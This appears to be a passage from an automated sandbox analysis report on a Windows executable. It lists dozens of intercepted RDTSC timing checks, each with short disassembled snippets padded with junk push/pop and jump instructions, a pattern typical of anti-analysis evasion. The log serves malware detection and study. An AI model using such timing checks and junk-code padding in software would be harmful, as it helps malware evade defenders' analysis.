Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA4C10 second address: CA4C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA4ED2 second address: CA4EE6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6F951A9EB8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnc 00007F6F951A9EB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA51BC second address: CA51D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA51D1 second address: CA51EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007F6F951A9EBEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA577B second address: CA577F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA577F second address: CA579F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007F6F951A9EB6h 0x00000013 pop edi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 js 00007F6F951A9EB6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA579F second address: CA57A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA57A7 second address: CA57B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F6F951A9EBEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA57B6 second address: CA57BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA5AA7 second address: CA5AC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA8E98 second address: CA8E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA92D7 second address: CA92F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F6F951A9EB6h 0x00000009 jmp 00007F6F951A9EC5h 0x0000000e pop edi 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA9448 second address: CA944C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA95C5 second address: CA95CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA98F1 second address: CA9910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F6F946E7E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F6F946E7E3Fh 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CAB2C2 second address: CAB2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CAFB56 second address: CAFB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6F946E7E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB7527 second address: CB752B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB752B second address: CB7556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 je 00007F6F946E7E59h 0x0000000d jc 00007F6F946E7E49h 0x00000013 jmp 00007F6F946E7E3Dh 0x00000018 jp 00007F6F946E7E36h 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5714 second address: CB5730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5730 second address: CB5747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F946E7E3Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5747 second address: CB574D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB574D second address: CB5757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6F946E7E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5757 second address: CB5774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC0h 0x00000007 ja 00007F6F951A9EB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5774 second address: CB5782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6F946E7E36h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB58EE second address: CB58F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB58F2 second address: CB5904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F6F946E7E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5BB4 second address: CB5BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5BBA second address: CB5BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F946E7E45h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5D03 second address: CB5D1C instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6F951A9EBBh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5FA4 second address: CB5FC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E42h 0x00000007 jns 00007F6F946E7E36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB5FC0 second address: CB5FCA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6F951A9EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB60F2 second address: CB610F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6F946E7E36h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F946E7E3Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB610F second address: CB6113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB6113 second address: CB6119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB6547 second address: CB654D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB735D second address: CB7363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB7363 second address: CB7367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB7367 second address: CB7391 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6F946E7E3Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F6F946E7E36h 0x00000013 jmp 00007F6F946E7E40h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB7391 second address: CB73A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jne 00007F6F951A9EBCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB73A6 second address: CB73AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB73AE second address: CB73BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB73BD second address: CB73C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB9B6C second address: CB9B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB9B70 second address: CB9B94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6F946E7E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6F946E7E47h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB9B94 second address: CB9BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F6F951A9EBEh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CB9BB2 second address: CB9BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CBFFB0 second address: CBFFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b js 00007F6F951A9ED3h 0x00000011 jmp 00007F6F951A9EC7h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BFBB23 second address: BFBB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CC0115 second address: CC0145 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6F951A9EBBh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F6F951A9EC0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CC0145 second address: CC0149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD1C0A second address: CD1C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F6F951A9EC2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD175A second address: CD175F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD175F second address: CD177B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6F951A9EC2h 0x00000008 jc 00007F6F951A9EBCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD18E1 second address: CD18E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD18E5 second address: CD18EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD18EE second address: CD18F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD7AAF second address: CD7ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC3h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD7ACA second address: CD7AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CD7AD0 second address: CD7AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CDA9B6 second address: CDA9EF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F946E7E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jmp 00007F6F946E7E48h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007F6F946E7E3Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CDA9EF second address: CDAA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 je 00007F6F951A9EBEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE7725 second address: CE772E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE772E second address: CE7737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE78B5 second address: CE78C9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6F946E7E38h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE78C9 second address: CE78EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6F951A9EB6h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F6F951A9EC5h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE7C17 second address: CE7C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE7C1D second address: CE7C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE7DB8 second address: CE7DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6F946E7E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE7DC2 second address: CE7DE0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6F951A9EB6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6F951A9EC2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE7DE0 second address: CE7DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE7DE9 second address: CE7DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE7DF4 second address: CE7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CE8049 second address: CE804D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CEB1BD second address: CEB1C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CEB1C3 second address: CEB1EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F951A9EBBh 0x0000000e js 00007F6F951A9EB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CF00C9 second address: CF00CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CF00CD second address: CF0105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F6F951A9EC4h 0x00000011 jmp 00007F6F951A9EBEh 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007F6F951A9EB6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D2F9F5 second address: D2FA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F6F946E7E3Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F6F946E7E36h 0x00000013 jbe 00007F6F946E7E3Eh 0x00000019 jg 00007F6F946E7E36h 0x0000001f push eax 0x00000020 pop eax 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D2FA1C second address: D2FA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D2FA27 second address: D2FA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D2FA2B second address: D2FA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D3F8F2 second address: D3F903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D42089 second address: D4208F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E078FA second address: E07900 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07900 second address: E07905 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07905 second address: E0790D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06644 second address: E0664A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0664A second address: E06668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F6F946E7E48h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06668 second address: E0666D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0666D second address: E0667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F6F946E7E36h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06937 second address: E0697C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F6F951A9ECAh 0x0000000b pushad 0x0000000c jmp 00007F6F951A9EBCh 0x00000011 jmp 00007F6F951A9EC0h 0x00000016 push edx 0x00000017 js 00007F6F951A9EB6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0697C second address: E06984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06CDE second address: E06CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6F951A9EC7h 0x0000000e rdtsc
